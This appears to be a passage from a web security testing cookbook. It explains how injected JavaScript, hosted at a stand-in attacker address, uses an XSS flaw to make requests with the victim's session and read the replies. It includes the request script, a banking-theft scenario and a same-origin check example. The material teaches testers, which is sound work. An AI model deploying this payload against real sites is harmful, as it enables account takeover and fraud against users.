One of the most powerful tools available to an attacker building an XSS exploit is the ability to generate requests to the target website from the victim's browser and to read the responses. This recipe discusses how JavaScript can be used to make requests to the target website from the victim's browser.
Solution
Create a JavaScript file containing the script in Example 1 and make it accessible at http://attacker.example.org/make_http_request.js (wherever your attack server is), and then insert it into the vulnerable page using the technique described in Example 2.
Example 1. JavaScript for making HTTP request
var xmlhttpreq;
if (window.XMLHttpRequest) {
    /* Most browsers use an XMLHttpRequest object for making
       AJAX requests */
    xmlhttpreq = new XMLHttpRequest();
}
else if (window.ActiveXObject) {
    /* Older versions of Internet Explorer use an ActiveXObject for making
       AJAX requests */
    xmlhttpreq = new ActiveXObject("Microsoft.XMLHTTP");
}
/* The third argument (false) makes the request synchronous, so the
   response is available immediately after send() returns */
xmlhttpreq.open("GET", "http://www.example.com/do_something", false);
if (window.XMLHttpRequest) {
    xmlhttpreq.send(null);
} else {
    xmlhttpreq.send();
}
/* The server's response is stored in the variable 'response' */
var response = xmlhttpreq.responseText;
Discussion
Example 1 will submit a request to the target website from the victim's browser, and the response will be stored in the variable response, where it can be parsed using JavaScript. The information contained in it can either be sent to the attacker, as in the previous two recipes, or used in subsequent requests made to the target website. For example, if an attacker finds an XSS vulnerability in an online banking website, the attacker could write JavaScript code to submit a request to the site, parse the account numbers from the response, and use them to initiate a transfer to the attacker's bank account.

This attack works because the victim's browser submits the user's session cookie to the vulnerable website along with each request to the website. The vulnerable website authenticates each request by verifying the user's session cookie and cannot differentiate between requests initiated by the legitimate user and requests generated by the attacker's JavaScript code.

This attack only works when the target website is vulnerable to XSS. Although it is possible to submit requests to any website via CSRF attacks, reading the server's responses and leveraging the information in them is only possible when the target is vulnerable to XSS. This is because web browsers enforce a "same origin policy" that only allows AJAX requests to be made to the website that the user is visiting. Using this technique, the attacker's script can mimic any action that the legitimate user can perform.
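The same-origin decision that the discussion rests on, written out as an added example (this is not code from the book): two URLs share an origin only when scheme, host and port all match, which is what separates a readable XSS-driven request from a blind CSRF one. It assumes the standard URL API (available in browsers and Node.js) and uses constructed example hostnames.

```javascript
// Normalise a URL to its origin "scheme://host:port", filling in the default
// port so that "http://www.example.com" and "http://www.example.com:80" agree.
function originOf(urlString) {
  const u = new URL(urlString);
  let port = u.port;
  if (port === "") {
    if (u.protocol === "https:") port = "443";
    else if (u.protocol === "http:") port = "80";
  }
  return `${u.protocol}//${u.hostname}:${port}`;
}

// Same-origin policy check: scheme, host and port must all be identical.
// Note that a subdomain (example.com vs www.example.com) is a different origin,
// as is a change of scheme (http vs https).
function sameOrigin(a, b) {
  return originOf(a) === originOf(b);
}

// Given the page in which a script is running and the URL it requests, state
// what the browser allows: on the same origin the script can both send the
// request and read the response (the XSS case from Example 1); on a different
// origin it can at most send the request blind (the CSRF case), unless the
// target explicitly opts in with CORS headers, which is not modelled here.
function scriptCapability(pageUrl, requestUrl) {
  return sameOrigin(pageUrl, requestUrl) ? "send-and-read" : "send-only";
}

// Constructed sample: script injected into a page on www.example.com.
const injectedPage = "http://www.example.com/search?q=test";
console.log(scriptCapability(injectedPage, "http://www.example.com/do_something")); // send-and-read
console.log(scriptCapability(injectedPage, "https://www.example.com/do_something")); // send-only
console.log(scriptCapability(injectedPage, "http://bank.example.net/transfer"));    // send-only
```

The "send-only" result is why an XSS flaw in the target site itself is required for the response-reading attack; a flaw elsewhere only yields CSRF.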